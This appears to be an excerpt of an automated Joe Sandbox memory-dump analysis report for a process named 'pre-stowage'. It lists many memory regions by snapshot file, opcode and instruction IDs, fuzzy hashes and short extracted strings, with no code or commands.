                                                                                                        • Source File: 00000000.00000002.1328779583.0000000007950000.00000040.00000800.00020000.00000000.sdmp, Offset: 07950000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_7950000_pre-stowage.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 838e513dc0434c1077d5f0ee6acec0f82dc9229a9f29bcf62e80a3545af2d82f
                                                                                                        • Instruction ID: a4a9bb133b6838189a27e5036f1a2964a3e19ef97027c1971ecf6fc3c7d16762
                                                                                                        • Opcode Fuzzy Hash: 838e513dc0434c1077d5f0ee6acec0f82dc9229a9f29bcf62e80a3545af2d82f
                                                                                                        • Instruction Fuzzy Hash: 187136B4E15219CFCB04CFA9C5849DEFBF2FF89210F24D52AD816B7224D3749A458B68
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1328779583.0000000007950000.00000040.00000800.00020000.00000000.sdmp, Offset: 07950000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_7950000_pre-stowage.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 42a666d8c89dc4d6ea2840044985a066a41371bc61201f5e5cbcd1c39c64601e
                                                                                                        • Instruction ID: 76a03bc34be5f83e41e1388641677c09121a0d2fa935a4646f858832698dbf2e
                                                                                                        • Opcode Fuzzy Hash: 42a666d8c89dc4d6ea2840044985a066a41371bc61201f5e5cbcd1c39c64601e
                                                                                                        • Instruction Fuzzy Hash: 107135B4E156198FCB04CFA9C5845DEFBF2FF89210F24D52AD806B7264D3349E468B68
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1328779583.0000000007950000.00000040.00000800.00020000.00000000.sdmp, Offset: 07950000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_7950000_pre-stowage.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 5d35d41371dc70fd9787df88f3c5236a7a75e60d419712e97cad8fe1c6260556
                                                                                                        • Instruction ID: 2f8199579f4659b7021b9778cd7d47ddcbd6bba722932e54e951e059be920394
                                                                                                        • Opcode Fuzzy Hash: 5d35d41371dc70fd9787df88f3c5236a7a75e60d419712e97cad8fe1c6260556
                                                                                                        • Instruction Fuzzy Hash: A94129B1E1521ADFCB44CFAAC5815AEFBF2FF88310F24C46AC915A7254D7309A418FA5
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1328779583.0000000007950000.00000040.00000800.00020000.00000000.sdmp, Offset: 07950000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_7950000_pre-stowage.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: bb13c38dc99b09c2ac8d4af77903172501f0a15c5b1c8f78eb733954661796f9
                                                                                                        • Instruction ID: c4e9b88bd9a115ce7f7f3b6d8a300f0b4c20f5337b6012871a02b63b7a705e97
                                                                                                        • Opcode Fuzzy Hash: bb13c38dc99b09c2ac8d4af77903172501f0a15c5b1c8f78eb733954661796f9
                                                                                                        • Instruction Fuzzy Hash: 714116F0E1521ADFCB44CFAAC5815AEFBF2FF88210F20C56AC915B7254D7309A418BA4
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1328779583.0000000007950000.00000040.00000800.00020000.00000000.sdmp, Offset: 07950000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_7950000_pre-stowage.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: adc89a88425a77efb4c15baf587069be367f7e79ae0fafbe0aeb2715d2cd5669
                                                                                                        • Instruction ID: 0772acf7bbef4efacbdb62d5177f104143ec9c3146bc57be6e51208b215ca288
                                                                                                        • Opcode Fuzzy Hash: adc89a88425a77efb4c15baf587069be367f7e79ae0fafbe0aeb2715d2cd5669
                                                                                                        • Instruction Fuzzy Hash: A1415EB0E1921ADFCB04CFA6D5416AEFBF1EF89304F10D86AD405B7264D3758B018B94
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1328779583.0000000007950000.00000040.00000800.00020000.00000000.sdmp, Offset: 07950000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_7950000_pre-stowage.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 501f3ba9a850579f24fcfc544a0656c82417cdf9f5b8fb3509d528f74913bf04
                                                                                                        • Instruction ID: 7a963c9b9d4c4941471c350be235f458d51a61204246447c56e2c41c12dc9393
                                                                                                        • Opcode Fuzzy Hash: 501f3ba9a850579f24fcfc544a0656c82417cdf9f5b8fb3509d528f74913bf04
                                                                                                        • Instruction Fuzzy Hash: 0F416FB1E1961ADFCB04CFA5C5416AEFBF2AF89304F24D86AD405BB264D3758B018B94
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1328779583.0000000007950000.00000040.00000800.00020000.00000000.sdmp, Offset: 07950000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_7950000_pre-stowage.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 6710244a5576de5d46d4375977c18f435d87cd7fa9f9f03591740f4976eb8cae
                                                                                                        • Instruction ID: a6bb8e331008784614515e06c0fca933b51679ded6b7b1d33eb0687a1dca5a3f
                                                                                                        • Opcode Fuzzy Hash: 6710244a5576de5d46d4375977c18f435d87cd7fa9f9f03591740f4976eb8cae
                                                                                                        • Instruction Fuzzy Hash: BE41F7B0E0421ADFCB04CFAAD4815AEFBF2FF89200F14C52AC815BB254D7359A418F98
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1328779583.0000000007950000.00000040.00000800.00020000.00000000.sdmp, Offset: 07950000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_7950000_pre-stowage.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 22b4441d13786ec80b578057c62b118c673c2cac31da948cd8fa5dd6d00be5f8
                                                                                                        • Instruction ID: 197763edbe1584f2505be641f2c06e7a8be0f4ffe96327fd608d1f06247c6bb4
                                                                                                        • Opcode Fuzzy Hash: 22b4441d13786ec80b578057c62b118c673c2cac31da948cd8fa5dd6d00be5f8
                                                                                                        • Instruction Fuzzy Hash: 8D41C7B1E0461ADFDB44CFAAD4816AEFBF2FF89200F14C56AC815AB254D7349A41CF94
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1328779583.0000000007950000.00000040.00000800.00020000.00000000.sdmp, Offset: 07950000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_7950000_pre-stowage.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: e60b149924d4d1eca6f79106b1343f279db578885e110ecf90c043778ed0fe66
                                                                                                        • Instruction ID: abd82e1ade66f921efb6d1582c43ea3d01985d1f1d66ee1a848224fe7d4408ae
                                                                                                        • Opcode Fuzzy Hash: e60b149924d4d1eca6f79106b1343f279db578885e110ecf90c043778ed0fe66
                                                                                                        • Instruction Fuzzy Hash: E921EDB1E046289BEB18CFABD80179EFBF7AFC9310F04C07AD918A6254EB3045568F51
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.3763527743.0000000000EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EF0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_4_2_ef0000_pre-stowage.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: (oq$(oq$(oq$,q$,q
                                                                                                        • API String ID: 0-189141485
                                                                                                        • Opcode ID: 79a5fc2f2677a6393f8462d90718851ff54c8508f0fdce791283431c944c1533
                                                                                                        • Instruction ID: 4e406efc0556c4611e17309df9f0472aa1bfcfae514abefc64181ef3300c2987
                                                                                                        • Opcode Fuzzy Hash: 79a5fc2f2677a6393f8462d90718851ff54c8508f0fdce791283431c944c1533
                                                                                                        • Instruction Fuzzy Hash: 43125B70A09209DFDB14CF68D884ABDBBF2BF88304F259069E995EB261D735ED41CB50
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.3763527743.0000000000EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EF0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_4_2_ef0000_pre-stowage.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: 0oEp$LjEp$LjEp$PHq$PHq
                                                                                                        • API String ID: 0-3801734409
                                                                                                        • Opcode ID: df878a0b6d2c427bcbb5598bb7c87ac6eb3549e9a2467747e48d6f885edb7594
                                                                                                        • Instruction ID: 9b4f40b43666e8a1f51123fb698be01f9f88cfa043c2086f5342b34ed75830c4
                                                                                                        • Opcode Fuzzy Hash: df878a0b6d2c427bcbb5598bb7c87ac6eb3549e9a2467747e48d6f885edb7594
                                                                                                        • Instruction Fuzzy Hash: B3A1D674E0121C9FEB14DFA9D984AADBBF2BF89304F249069E509BB361DB309945CF50
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.3763527743.0000000000EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EF0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_4_2_ef0000_pre-stowage.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: 0oEp$LjEp$LjEp$PHq$PHq
                                                                                                        • API String ID: 0-3801734409
                                                                                                        • Opcode ID: 12fc0be0d44a1250db55a5658084313fcaaa118a5fdecf935f2a71bfdd5f7bd3
                                                                                                        • Instruction ID: 9b1248ab6b8cbffdc42dd6778a0aaa6895f337e43a29e1c28cefb8ab3f44d81d
                                                                                                        • Opcode Fuzzy Hash: 12fc0be0d44a1250db55a5658084313fcaaa118a5fdecf935f2a71bfdd5f7bd3
                                                                                                        • Instruction Fuzzy Hash: A991D575E00618CFDB14DFA9D884AADBBF2BF89300F249069E909BB365DB349945CF50
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.3763527743.0000000000EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EF0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_4_2_ef0000_pre-stowage.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: 0oEp$LjEp$LjEp$PHq$PHq
                                                                                                        • API String ID: 0-3801734409
                                                                                                        • Opcode ID: fb961722ad44c92252660682aa47c852eafb91088c61795dd3c2ccf010f5f6c8
                                                                                                        • Instruction ID: 02eed573b7819325b2c96828f4bf4ad57def755a749a7c231d34c6c946237471
                                                                                                        • Opcode Fuzzy Hash: fb961722ad44c92252660682aa47c852eafb91088c61795dd3c2ccf010f5f6c8
                                                                                                        • Instruction Fuzzy Hash: 5681C274E0021C8FEB14DFAAD944AADBBF2BF88304F259069E919BB365DB305945CF50
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.3763527743.0000000000EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EF0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_4_2_ef0000_pre-stowage.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: 0oEp$LjEp$LjEp$PHq$PHq
                                                                                                        • API String ID: 0-3801734409
                                                                                                        • Opcode ID: 91f6c8d944477020025e4c09e4f6afdec2924842d14cdc1495a9cdad24eb9949
                                                                                                        • Instruction ID: 18493ed09517a9248184c6a9ac62ae43ff83b2828be0921965503854b0d0408d
                                                                                                        • Opcode Fuzzy Hash: 91f6c8d944477020025e4c09e4f6afdec2924842d14cdc1495a9cdad24eb9949
                                                                                                        • Instruction Fuzzy Hash: A981B574E04218DFEB14DFAAD844AADBBF2BF89300F149069E919BB365DB305945CF50
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.3763527743.0000000000EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EF0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_4_2_ef0000_pre-stowage.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: 0oEp$LjEp$LjEp$PHq$PHq
                                                                                                        • API String ID: 0-3801734409
                                                                                                        • Opcode ID: d0c50e7373bedd5305c692ee733b601a60c26b273b2a66b61a3bc115c0f6681e
                                                                                                        • Instruction ID: 8c57680ae0abeb4289d5531c12ed4fee41f2b6e01468a94e7f9da1faf293c7ab
                                                                                                        • Opcode Fuzzy Hash: d0c50e7373bedd5305c692ee733b601a60c26b273b2a66b61a3bc115c0f6681e
                                                                                                        • Instruction Fuzzy Hash: 0781C574E05218CFEB14DFAAD984A9DBBF2BF88300F249069E519BB365DB309945CF50
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.3763527743.0000000000EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EF0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_4_2_ef0000_pre-stowage.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: 0oEp$LjEp$LjEp$PHq$PHq
                                                                                                        • API String ID: 0-3801734409
                                                                                                        • Opcode ID: c0a9ac6f44bfa0b4e3d5c0f4b2fc76eb06667e3ad15f7be72ae84269493c8a83
                                                                                                        • Instruction ID: 36a3a73bf939fa75f41bd21b930aa3054c70e4fa9cae81dbaa5b72034bd5ceb3
                                                                                                        • Opcode Fuzzy Hash: c0a9ac6f44bfa0b4e3d5c0f4b2fc76eb06667e3ad15f7be72ae84269493c8a83
                                                                                                        • Instruction Fuzzy Hash: E1819174E0021C9FEB14DFAAD944AADBBF2BF88304F249069E919BB365DB305945CF50
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.3763527743.0000000000EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EF0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_4_2_ef0000_pre-stowage.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: 0oEp$LjEp$LjEp$PHq$PHq
                                                                                                        • API String ID: 0-3801734409
                                                                                                        • Opcode ID: 1d27652e8d2e0476e3faac89131ba1603fc8d6df49d9682542bb4b4dd3b2aaaf
                                                                                                        • Instruction ID: 76de7ee40e7fb1b8f03e4ad542fba00aa8b7303d7289867b586345383541ceb7
                                                                                                        • Opcode Fuzzy Hash: 1d27652e8d2e0476e3faac89131ba1603fc8d6df49d9682542bb4b4dd3b2aaaf
                                                                                                        • Instruction Fuzzy Hash: FD819074E0021C9FEB14DFAAD984AADBBF2BF88300F249069E519BB365DB705945CF50
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.3763527743.0000000000EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EF0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_4_2_ef0000_pre-stowage.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: 0oEp$LjEp$LjEp$PHq$PHq
                                                                                                        • API String ID: 0-3801734409
                                                                                                        • Opcode ID: 782731fc5d85ed96db581043f2a55a4385bea99df183da652fda90e0308baf55
                                                                                                        • Instruction ID: 952e3d89ce58e5048d8485d65ffc8461330f4206feffa0ac832f97410168d58c
                                                                                                        • Opcode Fuzzy Hash: 782731fc5d85ed96db581043f2a55a4385bea99df183da652fda90e0308baf55
                                                                                                        • Instruction Fuzzy Hash: D681B074E0021C9FEB14DFAAD984AADBBF2BF88304F249069E519BB365DB305945CF50
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.3763527743.0000000000EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EF0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_4_2_ef0000_pre-stowage.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: (oq$4'q$4'q$4'q
                                                                                                        • API String ID: 0-2528434116
                                                                                                        • Opcode ID: 844ef3c4d3f3ea466dfca73dce1c237e436d596ae55939a5ad786c59f77aa85b
                                                                                                        • Instruction ID: 9b564e001ea36faee02db1017d3313f28956aa37aa8e9e1362cbf6d77d0daf93
                                                                                                        • Opcode Fuzzy Hash: 844ef3c4d3f3ea466dfca73dce1c237e436d596ae55939a5ad786c59f77aa85b
                                                                                                        • Instruction Fuzzy Hash: A1A290B0A002098FCB15CF68C584ABEBBF2FF88304F198569E549EB265D735ED45CB52
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.3763527743.0000000000EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EF0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_4_2_ef0000_pre-stowage.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: (oq$Hq
                                                                                                        • API String ID: 0-2917151738
                                                                                                        • Opcode ID: 751c011080edc08bf0ac1ce5773313549cd9d194cba95145a6cfc586fdd739dc
                                                                                                        • Instruction ID: f93654f05d19979c3aaf5cf830ab0b4fade150732e24a4f31b2c3381979ac4a0
                                                                                                        • Opcode Fuzzy Hash: 751c011080edc08bf0ac1ce5773313549cd9d194cba95145a6cfc586fdd739dc
                                                                                                        • Instruction Fuzzy Hash: B6129C70B002198FDB14DF69C854BAEBBF2BF88304F249029E549EB395DB359D42CB90
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.3763527743.0000000000EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EF0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_4_2_ef0000_pre-stowage.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 34494c2001eb77b9f28235818e3d64040101814a64c998dcc92a4b78396861b0
                                                                                                        • Instruction ID: f1a20f753efd0f403f1072b5596bb984fd905a53c191aba06b4e5fa1d89d091f
                                                                                                        • Opcode Fuzzy Hash: 34494c2001eb77b9f28235818e3d64040101814a64c998dcc92a4b78396861b0
                                                                                                        • Instruction Fuzzy Hash: 85519974E04208DFDB18DFA6D454A9DBBB2BF89310F24912AE915BB364DB306942CF54
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.3763527743.0000000000EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EF0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_4_2_ef0000_pre-stowage.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 1b7b911c3d2f4f95c1e3bea505748fecdfbd3e4c98f7173e2fee38c758772ef8
                                                                                                        • Instruction ID: 173db34c21b5f642a92ee3182f2688915a7a344e33f76c0d400488f5c02641d2
                                                                                                        • Opcode Fuzzy Hash: 1b7b911c3d2f4f95c1e3bea505748fecdfbd3e4c98f7173e2fee38c758772ef8
                                                                                                        • Instruction Fuzzy Hash: B251A774E00308DFDB18DFAAD454A9DBBB2BF89300F24912AE915BB364DB306941CF54
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.3763527743.0000000000EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EF0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_4_2_ef0000_pre-stowage.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: (oq$(oq$(oq$(oq$(oq$(oq$,q$,q
                                                                                                        • API String ID: 0-2212926057
                                                                                                        • Opcode ID: 5bfec8967b6ad069b974a2606323060951511b35c2925d9206131c44813f2d7f
                                                                                                        • Instruction ID: 2e96d6d724a6aa6267c6683c5213c46cf721c8a5596b311873c64d97be037f89
                                                                                                        • Opcode Fuzzy Hash: 5bfec8967b6ad069b974a2606323060951511b35c2925d9206131c44813f2d7f
                                                                                                        • Instruction Fuzzy Hash: 87127E30A04249DFCB24CF68D884AAEBBF2FF49314F159559E989EB261D730ED41CB50
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.3763527743.0000000000EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EF0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_4_2_ef0000_pre-stowage.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: Hq$Hq
                                                                                                        • API String ID: 0-925789375
                                                                                                        • Opcode ID: 008e51400ab28abd3855c6eda1e688049e15ca72755041408f4c4680299e6879
                                                                                                        • Instruction ID: 2d7393a5c52272d37162fad31d7b9203b39229a3373d3600815087c05f70fd2f
                                                                                                        • Opcode Fuzzy Hash: 008e51400ab28abd3855c6eda1e688049e15ca72755041408f4c4680299e6879
                                                                                                        • Instruction Fuzzy Hash: A8B1DC317042088FEB259B34C854BBE7BA2AF88304F24956DE646DB3A6DB35CC42D791
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.3763527743.0000000000EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EF0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_4_2_ef0000_pre-stowage.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: ,q$,q
                                                                                                        • API String ID: 0-1667412543
                                                                                                        • Opcode ID: e24fe97cfc0c9979f8b2c15f4106976ee0d3c672bc5fdae926eb287538bf2b84
                                                                                                        • Instruction ID: 79ae71f4e3fc84b971316a5baba1c1c413030c47536d41c2bebe4271d9d0878a
                                                                                                        • Opcode Fuzzy Hash: e24fe97cfc0c9979f8b2c15f4106976ee0d3c672bc5fdae926eb287538bf2b84
                                                                                                        • Instruction Fuzzy Hash: C0817C70B005098FCB14DF69C484AB9BBF2BF89305B26A169D615FB365DB31EC41CBA1
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.3763527743.0000000000EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EF0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_4_2_ef0000_pre-stowage.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: (oq$(oq
                                                                                                        • API String ID: 0-1396055846
                                                                                                        • Opcode ID: 035927a9494e19defb790816b4e68f0722839059662f6c0388ffa99ce71364b4
                                                                                                        • Instruction ID: 0adddebd3a2e4b636a13af156da4bb41475580141128942b53007619dae4e64b
                                                                                                        • Opcode Fuzzy Hash: 035927a9494e19defb790816b4e68f0722839059662f6c0388ffa99ce71364b4
                                                                                                        • Instruction Fuzzy Hash: 7941E4717042048FC715AB74D8156BE7BF2AFC8350B185079E60AEB791DF369D428B61
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.3763527743.0000000000EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EF0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_4_2_ef0000_pre-stowage.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: Xq$Xq
                                                                                                        • API String ID: 0-1556399337
                                                                                                        • Opcode ID: f9ad8e5fc7904fba2df724e6b31c9fb4fd308a6042ae06fe9b9e91f145911557
                                                                                                        • Instruction ID: b11ef3c632be4d6859435b8766a5a636b72c2a5f6cfcb2868d79a56431240945
                                                                                                        • Opcode Fuzzy Hash: f9ad8e5fc7904fba2df724e6b31c9fb4fd308a6042ae06fe9b9e91f145911557
                                                                                                        • Instruction Fuzzy Hash: 21310A31B0432D4BDF28467588953BEA6A6ABC4309F28503ED907E7380DB76CE459361
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.3763527743.0000000000EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EF0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_4_2_ef0000_pre-stowage.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: $q$$q
                                                                                                        • API String ID: 0-3126353813
                                                                                                        • Opcode ID: 04444a0faccb306ea5c37b76c49733b6fe13a4ab446ec668a973173aa3188270
                                                                                                        • Instruction ID: b81c9e870003dc62ce9dca99e4c59fab47f8442a97d4cf2c1f618509d409cc88
                                                                                                        • Opcode Fuzzy Hash: 04444a0faccb306ea5c37b76c49733b6fe13a4ab446ec668a973173aa3188270
                                                                                                        • Instruction Fuzzy Hash: D331053130424D8FDB358B29D99477E7B67FF84704B2515AAF142EB292DE29CC40C791
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.3763527743.0000000000EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EF0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_4_2_ef0000_pre-stowage.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: 4'q$4'q
                                                                                                        • API String ID: 0-1467158625
                                                                                                        • Opcode ID: 6a14853daa989ae84024af7cb5795782a1cb71c580bf77e1831ea0983f9aa18f
                                                                                                        • Instruction ID: 77813885bcd4ab1966fe6b1fc5c9c7337e9b959ad7cb7bfa96a872e77734f725
                                                                                                        • Opcode Fuzzy Hash: 6a14853daa989ae84024af7cb5795782a1cb71c580bf77e1831ea0983f9aa18f
                                                                                                        • Instruction Fuzzy Hash: 40F0CD353002092FDB181AA6A85577BBBCBEFCC350B148029BA49C7341ED72CC0187D0
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.3763527743.0000000000EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EF0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_4_2_ef0000_pre-stowage.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: LRq
                                                                                                        • API String ID: 0-3187445251
                                                                                                        • Opcode ID: 671cc31b761b991d9a6f4f92e4719009d6261c73a71c86f33cd2934322e75cf0
                                                                                                        • Instruction ID: 9c452757606dce8f58f2392c1fb279b6abe07a1673d0a50acda67ca7fd8921c9
                                                                                                        • Opcode Fuzzy Hash: 671cc31b761b991d9a6f4f92e4719009d6261c73a71c86f33cd2934322e75cf0
                                                                                                        • Instruction Fuzzy Hash: AA520EB8944219CFCB64EF24ED85B9DBBB2FB88305F1045A9D449AB358DB306E85CF41
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.3763527743.0000000000EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EF0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_4_2_ef0000_pre-stowage.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: F
                                                                                                        • API String ID: 0-2701363647
                                                                                                        • Opcode ID: 37bea64abd9b90520a2c1fd03468fc8055d0acdb4dd4f75fcc8e7ec56543d9fa
                                                                                                        • Instruction ID: 23737d354dbdaccc015abd4e7df47642ffb1c55c8a36c11fff336e4be97b5190
                                                                                                        • Opcode Fuzzy Hash: 37bea64abd9b90520a2c1fd03468fc8055d0acdb4dd4f75fcc8e7ec56543d9fa
                                                                                                        • Instruction Fuzzy Hash: 4C315870D0824D8FCB05EFA9D8456EDBBF4AB4A300F10516ED644F72A4EB351945CBA1
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.3763527743.0000000000EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EF0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_4_2_ef0000_pre-stowage.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
